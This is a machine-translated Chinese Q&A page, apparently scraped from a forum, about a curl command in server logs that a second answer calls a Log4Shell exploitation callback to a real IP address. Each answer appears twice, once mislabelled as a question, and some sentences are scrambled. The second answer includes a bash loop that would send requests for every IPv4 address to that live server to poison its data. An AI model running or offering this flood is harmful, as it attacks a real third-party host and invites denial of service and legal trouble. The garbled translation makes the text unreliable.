当curl命令的地址中有一个/时，这意味着什么？

Question 1

这并不意味着任何异常：斜杠将主机和端口与路径分开。

curl 195.54.160.149:5874/66.228.37.152:80

/66.228.37.152:80将连接到 195.54.160.149 上的端口 5874 并请求使用识别的资源

GET /66.228.37.152:80 HTTP/1.1

66.228.37.152:80您可以通过在 Web 服务器上托管一个名为的文件来自行设置类似的内容。服务器对路径的实际操作取决于服务器所有者的设置。

Answer

这并不意味着任何异常：斜杠将主机和端口与路径分开。

curl 195.54.160.149:5874/66.228.37.152:80

/66.228.37.152:80将连接到 195.54.160.149 上的端口 5874 并请求使用识别的资源

GET /66.228.37.152:80 HTTP/1.1

66.228.37.152:80您可以通过在 Web 服务器上托管一个名为的文件来自行设置类似的内容。服务器对路径的实际操作取决于服务器所有者的设置。

Question 2

您正在看到 Log4Shell 漏洞在野。就像上面其他人所说的那样，它正在警告来源，他们发现了一个可利用的节点。您特别链接的节点是一个俄罗斯节点，与我的日志中显示的节点相同 - 我开始回复同一台服务器，试图掩盖他们可能发现的任何内容。

for firstoctet in {0..255}; do
  for ip in ${firstoctet}.{0..255}.{0..255}.{0..255}; do 
    curl -s 195.54.160.149:5874/${ip}:80 
  done
done

Answer

您正在看到 Log4Shell 漏洞在野。就像上面其他人所说的那样，它正在警告来源，他们发现了一个可利用的节点。您特别链接的节点是一个俄罗斯节点，与我的日志中显示的节点相同 - 我开始回复同一台服务器，试图掩盖他们可能发现的任何内容。

for firstoctet in {0..255}; do
  for ip in ${firstoctet}.{0..255}.{0..255}.{0..255}; do 
    curl -s 195.54.160.149:5874/${ip}:80 
  done
done

相关内容